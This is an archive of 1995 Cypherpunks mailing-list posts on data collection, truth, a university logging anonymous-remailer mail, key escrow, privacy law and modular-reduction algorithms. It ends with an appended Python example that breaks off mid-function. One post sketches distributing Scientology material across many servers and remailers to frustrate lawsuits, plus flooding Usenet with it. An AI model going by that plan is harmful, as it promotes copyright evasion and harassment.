> >rape when you think about it for awhile. Everything you buy, on credit, is
> >recorded and sold to someone who wants to know your secrets. Everytime
> >you make a banking transaction, someone is watching and compiling the
> >data.
> >
> 
> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> Things are much simpler and less stressful when you don't look to the law
> to fix things.
> 

Nor was I suggesting a legal solution (I know your comment
was triggered by Rob's request for legal recourse) but instead
suggesting that things are farther along than some people realize.

Someone suggested a rational, non-hysterical approach to
converting people.  Perhaps.  I certainly wrote a nice letter
to the editor of a magazine which published a piece about
electronic checking, and made sure to mention that e-cash
would be preferable to some.  

On the other hand, The Gub'mint is certainly conducting a
campaign overt and covert to throttle unlimited and uncontrolled
use of cryptography.  That combined with how politicized
things are these days, it can be difficult to conduct a rational
debate or in fact find anyone who wants to talk. 

Personally, I'm of the opinion that we need to a pre-emptive
crypto strike.  But just as the 'Privacy Card' has been debated
here endlessly, so too reaching critical market mass w/a 
'bump in the cord' product.



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 20:33:36 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Collection of personal info
In-Reply-To: <199509070227.VAA00478@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.950906223208.12556D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Doesn't make it true, in Tim's sense--just makes it verifiable.

MacN

On Wed, 6 Sep 1995, Jim Choate wrote:
> Truth is that which can be verified to be reproducible by independent and
> unbiased parties. All else is opinion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Wed, 6 Sep 95 22:54:30 PDT
To: cypherpunks@toad.com
Subject: Diskreet Disk Help Needed
Message-ID: <199509070555.WAA11056@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


One of my Diskreet Disks has refused to open but will change size and password.  Any suggestions??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 6 Sep 95 20:44:26 PDT
To: cypherpunks@toad.com
Subject: ON  OFF-TOPIC
Message-ID: <199509070639.BAA00416@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                    ON  OFF-TOPIC

     THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!


       CRYPTO CODERS SUPPLY THE MEANS!
CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!


conspiracy theorist = alternative political theorist
NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post
opinion moulders syndicate

"extremist right-wing kook" = old fashioned American patriot
Left term used often by left-wing extremist liberal statist kooks.

The United States "Federal" Government - we'll be even more American
without it.



                                              PUSH EM BACK! PUSH EM BACK!
                                              WWWAAAYYYY  BBBAAACCCK!
                                              BBBEEEAAATTTT  STATE!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 22:46:01 PDT
To: cypherpunks@toad.com
Subject: What is truth?
Message-ID: <ac73d35421021004239f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:07 AM 9/7/95, Jim Choate wrote:
>>
>> Doesn't make it true, in Tim's sense--just makes it verifiable.
>>
>> MacN
>>
>> On Wed, 6 Sep 1995, Jim Choate wrote:
>> > Truth is that which can be verified to be reproducible by independent and
>> > unbiased parties. All else is opinion.
>>
>
>What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly
>what he means by 'truth'.  To me it sounds like he is saying that there is
>some viewpoint that is absolute. I no more believe in absolute viewpoints
>than I believe in absolute coordinates.

I promise to be mercifully brief. This is a subject that we could all go on
and on about. I used the ironic "What is truth?," a la Pilate, to indicate
some degree of ambiguity. How Jim concluded that I have some absolutist
viewpoint from this simple line is unclear to me.

In any case, I don't believe there are "independent and unbiased parties"
who can determine what truth is. Not that there is no measure of truth. I
am no solipsist, and I believe we have a much clearer view today of how
things work than we had, say, 500 years ago. Courtesy of science and the
core idea of falsifiability.

As this view relates to government and law, it is that many things are best
left outside the bounds of the law. The law stays out of most inter-family
disputes, for example, unless violence or fraud of a major sort occurs.

And the law stays out of confirming or refuting religious claims. If
Preacher Bob says that praying to Baal will save one's soul, no law officer
will step in and stop this "lie." As I like to put it, of the N different
religions, at most _one_ of them is "true," and the other N - 1 are based
on lies. So, if we are to "allow" religious freedom we must surely allow
lies to be told. Q.E.D.

Our liberal, Western society went through this debate a long time ago, and
it was pretty much concluded that people could choose their own paths to
hell without interference from others. That people were free to believe any
damned fool idea they wanted to believe in.

Somewhere along the line we've adopted the new view that government needs
to correct all incorrect thoughts, needs to protect people from "hurtful"
ideas and speech, and needs to determine what is true and what is not true.

If you want more information on my views about truth, check out the work on
"evolutionary epistemology," especially the writings of William Bartley and
Karl Popper.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 6 Sep 95 21:02:31 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <Pine.ULT.3.91.950906230159.23134A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Sep 1995, Jeff Simmons wrote:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.

I'd say that there are some serious ethical and legal concerns that 
should be addressed by the administration for keeping such logs...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 20:04:38 PDT
To: damion.furi@the-matrix.com
Subject: Re: Collection of personal information etc. etc. etc.
In-Reply-To: <8B094FC.000504D58B.uuout@the-matrix.com>
Message-ID: <199509070305.XAA18310@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain




>         It's not just credit anymore.  If you buy something at Radio
>         Shack, even with cash, they want you to give all your info
>         voluntarily and they _will_ give you flack if you don't
>         cooperate (which can be short-circuited by threatening to cause
>         a scene or by suggesting loudly that <competitor> has lower
>         prices).

Depends on the counter people. The local RS here the clerks don't care
much about it and will enter a random number. A local Service Merchandise
does the same thing, but they're pesky, so I make up silly names to test
the wits of impatient teenage mutant cashiers.  (They also used to have
a computer where you enter your telno. and place orders to pick up at
the desk... I don't think the system bills you automatically but the
employees probably won't like it when you have them get 10 weight sets
out...)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 20:05:35 PDT
To: jsimmons@goblin.punk.net (Jeff Simmons)
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <199509070306.XAA18362@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



So which university is this?

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@dronf.org (Jaeson Engle)
Date: Wed, 6 Sep 95 21:06:09 PDT
To: cypherpunks@toad.com
Subject: ULC Online
Message-ID: <v02130500ac74211b4db2@[152.97.1.23]>
MIME-Version: 1.0
Content-Type: text/plain


Just in case anyone else wants to go ahead and get ordained in the ULC,

http://ybi.com/ulc/ordain.html

Online form for getting ordained.

Jaeson


--
Jaeson M. Engle                     http://www.dronf.org
            Coordinator of the Jourvian Group
PGP Mail Encouraged ->   jme.pub.key@dronf.org
Project List                     ->        programs@dronf.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 6 Sep 95 23:30:51 PDT
To: Jim Gillogly <jim@rand.org>
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509070612.XAA16340@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


                                                                                
J.G. on "proposed escrow techniques":
>In order to help make most productive use of the limited time
>available at the upcoming meeting and to better focus
>deliberation, the following criteria are being distributed for
>discussion purposes.  Since it is important that final criteria
>be clear, straightforward, consistent, and implementable, please
>review these draft criteria and be prepared to discuss
>how they may be refined and made more specific.

could someone explain to me why the passive voice is being used
in this proposal? who is proposing these criteria?

there is a saying "he who appeases an alligator does so in hopes
of being eaten last".

J.G., where did this list of proposal items come from? from you?
are you a private researcher? if so, how do you justify this list?
I mean, I can imagine someone from the NSA coming up with something
this specific and restrictive, but frankly I find it in rather
poor taste for private, unaffiliated researchers trying to
bargain with the NSA. there is a clear-cut right to encryption in
a free society, and anything less is a compromise with totalitarianism
IMHO.

IMHO no genuine self-respecting cypherpunk would be involved in any kind
of discussions involving government key escrow, unless to go as
an agent provocateur. the whole issue lends an "aura of legitimacy"
to an issue that has absolutely none. it's like the Perl shirt--
as I have said many times, as long as people argue about the 
precise legality of the code, they are *losing* the battle with the
NSA and playing into their hand and exactly the kind of paranoia
over cryptography use they are trying to cultivate.

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 20:46:27 PDT
To: cg@bofh.lake.de
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <m0sqR1Y-000Pa2C@bofh.lake.de>
Message-ID: <199509070346.XAA14571@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Anyone ready to risk running a "Scientology .sig virus server"?


Here's the idea. The CoS apparently freaks out and sues anyone who
distributes CoS material, even those who quote small portions of it.
In the same spirit of the "export-a-sig-PGP" system, why not break
the CoS materials up into n pieces (each piece being 5-10 lines long)
and let people request chunks from a server to put in this .sig?
The assumption is, the Church can't sue everyone (legal funds
being limited). I think I'd do it just to piss them off.

To spread the risk around even more, I'd place the "piece server"
on k different HTTP sites just so they can't raid them all. Even
better would be to use a script on one master server to
dynamically return HTTP redirects to k different URLs to the real
servers. Another option is dynamic DNS.

Finally, you could have the server run thru email via a chained
anonymous return block. The result would be sent back thru
a remailer chain.

The nastiest thing I can think of is to get the CancelBot people to
let a massive broadcast of CoS materials be sent to UseNet. Other
options include servers which detect known CoS source addresses
and provide "fake fronts" to them. (easily doable with CGI/CERN server
and IDENT).

Cypherpunks oughta be able to figure out something to show those idiots
why their actions are ultimately futile.

-Ray


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 6 Sep 95 20:52:21 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950906235249.14145B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Jeff Simmons wrote:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.



Which University please?

> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 22:01:44 PDT
To: mnorton@cavern.uark.edu (Mac Norton)
Subject: Re: Collection of personal info
In-Reply-To: <Pine.SOL.3.91.950906223208.12556D-100000@cavern>
Message-ID: <199509070507.AAA01347@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> Doesn't make it true, in Tim's sense--just makes it verifiable.
> 
> MacN
> 
> On Wed, 6 Sep 1995, Jim Choate wrote:
> > Truth is that which can be verified to be reproducible by independent and
> > unbiased parties. All else is opinion.
> 

What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly
what he means by 'truth'.  To me it sounds like he is saying that there is
some viewpoint that is absolute. I no more believe in absolute viewpoints
than I believe in absolute coordinates.

If it is the 'truth' what makes it unverifiable? If I can look at it and
claim it isn't the truth (because I can't verify it) how does one know it
is the truth then? What separates this unverifiable truth from opinion
(which is equally unverifiable by definition)? What is the litmus test? And
how do we know the litmus test is true? (I see a circle coming up)

For example, let's say that I have an accident with another motorist. We each
tell our story but they are different (or the same for that matter). Which is
true? I would hold neither. The incident as described by either of us is
simply our recollection of happenstance, in other words our opinion of what
occurred. It is not what occurred. The only truth that could be derived would
be that an accident had occurred. Why? Because we would have two bent cars
that anyone who cared enough could verify.

The truth is not some mighty sword we can wield to reveal some shrouded
mystery. It is the realization that the world is a complicated place and we
deal with incomplete facts (ie fog of war). From this meager litany of facts
we try to derive some conclusion that allows us to control our environment.
Truth is a mundane everyday sort of thing, not some magical force. The truth
will not free you nor will it guarantee a better tomorrow.

The whole argument breaks down to the simple question of whether it is
possible to know anything absolutely. If it is possible to know something
absolutely what else to call it but fact (and therefore true)? If it isn't a
fact then it is either a lie (ie the inversion of truth) or else an opinion.
I don't see how there can be any other division than these three.

Another way to look at it is to say that if it involves faith it can't be
truth. Truth can't be dependent on faith (ie observer).

[Looking over this I realize that we are talking about a form of
computability]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 22:51:21 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B09569.000504D5D6.uuout@the-matrix.com>
Message-ID: <8B0A00E.000504D665.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



DM|Depends on the counter people. The local RS here the clerks don't care
  |much about it and will enter a random number.

        I wish they would do that here.  I've just about yanked a
        manager over the counter over it.

  |A local Service Merchandise
  |does the same thing, but they're pesky, so I make up silly names to test
  |the wits of impatient teenage mutant cashiers.  (They also used to have
  |a computer where you enter your telno. and place orders to pick up at
  |the desk... I don't think the system bills you automatically but the
  |employees probably won't like it when you have them get 10 weight sets
  |out...)

        <chuckle>  I love it when the system has a flaw I can take
        a crowbar to.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 134...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Wed, 6 Sep 95 21:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: University logging mail to anon.penet
In-Reply-To: <Pine.ULT.3.91.950906230159.23134A-100000@krypton.mankato.msus.edu>
Message-ID: <199509070454.AAA19936@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


hayden@krypton.mankato.msus.edu said:
> I'd say that there are some serious ethical and legal concerns that 
> should be addressed by the administration for keeping such logs... 

Ethical I would definitely agree with.

Legally, I'm not so sure of. The applicable law would appear to be the 
Electronic Communications Privacy Act of 1986. The law does allow 
administrators to see messages in the normal course of their job, as long as 
they don't reveal that information to a 3rd party (except law enforcement in 
the event of a criminal act)

This protection is probably strongest with a company you purchase Internet 
Service from, probably lesser so with a University, since there is less 
obviously a customer/seller relationship, and almost non-existent with a 
business, since there isn't a customer relationship, and the systems are owned 
by the business.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 23:21:56 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <m0sqaLG-00061XC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:38 PM 9/6/95 -0400, hallam@w3.org wrote:

>People who go round drawing parallels to gun ownership and cryptography 
>ownership are simply playing into the government's hands. 
  
Which of our rights would you have us surrender so as to not play into the
government's hands?


>Cryptography has net  benefits to society. 
  
You would have a hard time proving that cryptography has more, or
different "net benefits to society" than gun ownership does.
  


>Most advocates of gun ownership tend to convince me of 
>little more than they are a danger to society. Regardless of their case they are 
>the biggest argument for gun control, and therefore poor advocates of their 
>cause. 
  
Statists say the same thing about crypto-advocates.  Talking about 
keeping secrets, and discussing which methods are uncrackable
by the government is not what a statist wants to hear - and neither
is talk about the real reason behind the 2nd Amendment.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 7 Sep 95 01:31:22 PDT
To: jsimmons@goblin.punk.net
Subject: Re: University logging mail to anon.penet
Message-ID: <199509070815.AA00296@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Jeff Simmons writes:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.

With respect to logging of student traffic, I'd look at the Family 
Education Rights Privacy Act ("Buckley Amendment", 20 USC 1232g) and
the California analog to it (assuming one exists; Oregon's is located
at OAR 571-20-005, et seq.). The release of information about individual
students beyond "directory information" (e.g., name, dates of attendance,
degrees granted, etc) is sharply limited without the consent of the
student. Information about mail traffic sent and received is, IMHO,
arguably (but not clearly) within "educational records" for FERPA 
purposes. 

To establish a Buckley Amendment violation (and I'm not saying there
was one here) you'll still need to find a University employee to pin
the disclosure on. If it's a University employee who posted them to
the newsgroup, it's easy. If the University employee merely maintained
those records in a place where an outsider was able to easily gain 
access to them, it seems like a bigger stretch. 

I had occasion to talk with a relatively high-level administrator in
the University of Oregon's computer center some time ago and he
explained that they've had to go to some trouble to make sure that
gopher/WWW directories and other contemporary university computing
practices don't fall afoul of the Buckley Amendment. Perhaps the
powers that be at other places aren't quite so forward-thinking 
(or don't have the questionable benefit of being next door to a
building full of law students with time on their hands). 

Perhaps an even longer stretch would be an argument that the practice
of logging (and of keeping those logs in an insecure place) violates
students' (and others') right to privacy. Federal protection for a
"right of privacy" is fickle, but California protects its citizens'
right to privacy in its constitution.

(I'm not an attorney (yet), don't live in California (right now) and
consequently don't know much about CA law. So please think about this
message as maybe a hint in (I hope) a useful direction, not necessarily
the right answer. Feh.)

This concrete issue seems like a good reminder of the implications of
the way that we think about "cyberspace" and the things that happen 
when we use computers. If one thinks about a machine or a network as
"public space", logging or reporting activities which happen there
(e.g., Alice walks over to visit Bob, leaving footprints everyone can
see in /var/adm/syslog) seems reasonable or at least not offensive,
and it seems silly to talk about being angry because someone wrote down
what everyone could see. But if we think about machines and networks
as being private space, reporting on what Alice and Bob do seems
tacky and rude at best, and horrifying (and likely to create liability)
at the other end of the spectrum. As much as I dislike the 
"cyberspace" metaphor, its use or misuse has serious consequences.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@japan.sbi.com>
Date: Wed, 6 Sep 95 09:17:28 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: "This discussion is off-topic, please take it elsewhere"
In-Reply-To: <Pine.PMDF.3.91.950906102111.539017112C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SUN.3.91.950907011451.4869A-100000@doe905f>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 6 Sep 1995, Michael Froomkin wrote:
>
> You keep talking about this "Eric Hughes" nym.  I've been a member of 
> this list for weeks, months, over a year even, and I never see any posts 
> from "him".  Is he a dead tentacle?

[deleted]

> 
> This post is smiley-free and may injure the humor-impaired.
> 

is he kidding ?

-Jon

PS: In case I qualify as humor impaired - Eric 'potty-trains' majordomo.

--
  Jonathon Fletcher, Salomon Brothers Asia Limited, Tokyo
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 22:50:15 PDT
To: rsnyder@janet.advsys.com (Bob Snyder)
Subject: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509070454.AAA19936@janet.advsys.com>
Message-ID: <199509070542.BAA23214@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Snyder wrote:

> hayden@krypton.mankato.msus.edu said:
> > I'd say that there are some serious ethical and legal concerns that 
> > should be addressed by the administration for keeping such logs... 
> 
> Ethical I would definitely agree with.
> 
> Legally, I'm not so sure of. The applicable law would appear to be the 
> Electronic Communications Privacy Act of 1986. The law does allow 
> administrators to see messages in the normal course of their job, as long as 
> they don't reveal that information to a 3rd party (except law enforcement in 
> the event of a criminal act)

I'm no lawyer, but I believe that technically the ECPA allows them to view
mail when it is part of maintenance, which could be in the "normal course of
their job[s]" but I think it means that if they see mail while maintaining
(ie, bounced msgs) it's Ok to read it but maintenance doesn't mean outright
monitoring of mail.

Then again, what does the ECPA say about monitoring message traffic? That's
essentially what they are doing, and likely they will rationalize it as
being to save their own skins.  It also might be the work of a SysAdmin
and the school administration would be entirely clueless about it.  Another
possibility is that a hacker (the same who got ahold of the file?) put in
something to monitor it... (my knowledge of Unix is little, though...)

> This protection is probably strongest with a company you purchase Internet 
> Service from, probably lesser so with a University, since there is less 
> obviously a customer/seller relationship, and almost non-existent with a 
> business, since there isn't a customer relationship, and the systems are owned 
> by the business.

I've heard some nasty stories about boards and a couple of I-Net providers
who charge for access but reserve the right to throw someone off the system
without refund (it's often in the terms of many account applications) for
various no-nos.

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 7 Sep 95 00:31:53 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: What is truth?
In-Reply-To: <ac73d35421021004239f@[205.199.118.202]>
Message-ID: <199509070729.CAA01800@einstein>
MIME-Version: 1.0
Content-Type: text



> 
> I promise to be mercifully brief. This is a subject that we could all go on
> and on about. I used the ironic "What is truth?," a la Pilate, to indicate
> some degree of ambiguity. How Jim concluded that I have some absolutist
> viewpoint from this simple line is unclear to me.
> 

Actually from your statement I would conclude that you don't believe truth
exists at all. That was the original in context intent of the quote you
used. Ambiguity is like pregnancy, it is there or isn't. Bottom line being
whether your position is that there is or isn't an absolute it falls to the
same line of argument...faith. 

My personal opinion is that we are way too ignorant/stupid to ever answer
the question.

> In any case, I don't believe there are "independent and unbiased parties"
> who can determine what truth is. Not that there is no measure of truth. I
> am no solipsist, and I believe we have a much clearer view today of how
> things work than we had, say, 500 years ago. Courtesy of science and the
> core idea of falsifiability.
> 

This is exactly the opinion of the great minds of their time as well. I
suspect you are just as wrong as they were. If this isn't solipsism I don't
know what is. We are no valid measurer of our ignorance. We are simply too
close to see where the horizons truly are. The catch here is we will always
be too close.

The real issue is not whether there is an observer who can discern the truth
but rather; is there a truth to discern in the first place?

> 
> And the law stays out of confirming or refuting religious claims. If
> Preacher Bob says that praying to Baal will save one's soul, no law officer
> will step in and stop this "lie." As I like to put it, of the N different
> religions, at most _one_ of them is "true," and the other N - 1 are based
> on lies. So, if we are to "allow" religious freedom we must surely allow
> lies to be told. Q.E.D.
> 

You are confusing 'lie' and 'opinion'. No religion is true, they are based
on faith and therefore unprovable. That which is unprovable is neither truth
nor lie, it simply is.

> 
> Somewhere along the line we've adopted the new view that government needs
> to correct all incorrect thoughts, needs to protect people from "hurtful"
> ideas and speech, and needs to determine what is true and what is not true.
> 

Who is this 'we' kimo-sabi? If this were true 'we' wouldn't even be having
this discussion. As to it being a new idea, hardly.

> "evolutionary epistemology," especially the writings of William Bartley and
> Karl Popper.
> 

Read some of them, believe they are as full of shit as all other philosophers
when taken as a whole. While individual ideas that these folks have presented
have quite a bit of merit as a whole not a single philosopher has ever
produced a work that has really been ground shattering. You disagree? Then
explain why no philosopher has managed to overshadow all the others?

{And for those Christians out there who will invariably send me mail,
Christianity is not the largest religion in the world, only in the US does it
hold a numerical superiority.} 

The reason is quite simple and one of the main problems with philosophers
and politicians. They keep making the same damn mistake, they assume that
since it works for them it will work for anyone (and therefore everyone) else.
This is an incorrect assumption. The real problem with philosophers and
politicians is that at some point they start to believe their own press
releases.

Consider this, if 'truth' is so hard to define or observe why is there not an
equally biased discussion about 'lie'? Few people have a problem with the
concept of a lie. We can argue blissfully for centuries over what truth is
but if we question what a lie is we get termed pathological. What is it about
human psychology that causes this?

Take care.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Sep 95 01:14:50 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: fast modular reduction
In-Reply-To: <199509070157.VAA16973@clark.net>
Message-ID: <199509070811.EAA07559@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
> modifications. Is there an algorithmic analysis available? I also
> I think there is a bug in your description. Let k+1 = n+1
> (e.g. the dividend is 1 more "block" than the modulus). Then
> i=n starting out, and we have

 Upon a closer look, I see there's no mistake. The algorithm will
never reach k=n because the loop stops at n+1.

 Anyway, I played around with the algorithm a little, and it's neat
and easy to implement, but the speed increase is not worth
the patent hassle (assuming there is a speed increase, I saw none)

  The algorithm is still basically O(n^2) if used in a modexp
routine. It requires n^2 multiplications and additions. Whereas,
a typical Karatsuba multiplication using a high precision
reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8
additions. (for n=64 which is a 2048-bit number being reduced, 
it's about 1/5 the multiplications, but 5 times the additions)


Two other possible algorithms are:

Let P(x) = sum(i=0 to n-1) a_i x^i be a multiprecision integer
radix x.

If m is a modulus, of length n/2, rewrite P(x) as

sum(i=0 to n/2-1) a_i x^i  + x^(n/2) (a_{n/2 + i} x^i)

break the summation into two parts. Focus on the second term.
(both terms are not equal, or one digit larger than the modulus)
Perform modular reduction of the right hand polynomial using
Horner's method

x*(x*(x*...(x*a_i + a_{i-1} mod m)mod m)mod m) 

Those internal mod m's can be done quickly with a 2-digit
trial quotient estimation.


It's still O(n^2), but might be quicker.

Still another technique..

Rewrite P(x) 

(a_0 + a_2 x^2 + a_4 x^4 + ...) + x (a_1 + a_3 x^2 + a_5 x^4 + ...)

(broken into two Polys with odd and even terms)
Factor out x^2 out of each piece and write

a_0 + ((a_2 + a_4 x^2 + a_6 x^4 + ...)*x^2) + 
x*(a_1 + x^2*(a_3 + a_5 x^2 + a_7 x^4 + ...))

Now keep applying the recursive rule until the length of the
poly pieces are the same or smaller than the modulus. Now,
start evaluating from the inner layers. Multiply each piece by
x^2 (two shifts), and take the mod. Sum the results, shifting one side by 
1 (for the x factor). Shifts are free because an array representation
yields a shift with a pointer movement.


It looks kinda like the method for evaluating  FFTs a little bit,
but it's not. Just something off the top of my head just now.
(I hereby place it in the public domain assuming it's worth
anything, no patents please)  I think with a clever implementation, you can 
trade some mults for more adds, but still use less additions than russian 
peasant.


-Ray
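
The first alternative in the message above (Horner's rule with a "mod m" after every digit, each one done with a two-digit trial quotient), written out as an added example; it is not part of the original post. The 16-bit radix, the normalising shift (taken from Knuth's Algorithm D) and all function names are assumptions of this example, and it runs Horner over every digit of P rather than only the high half, which generalises the split described in the post.

```python
import random

DIGIT_BITS = 16                 # assumed digit size; the post leaves the radix open
B = 1 << DIGIT_BITS             # the radix "x" of the post


def to_digits(value):
    """Little-endian radix-B digits a_0, a_1, ... of a non-negative integer."""
    digits = []
    while value:
        digits.append(value & (B - 1))
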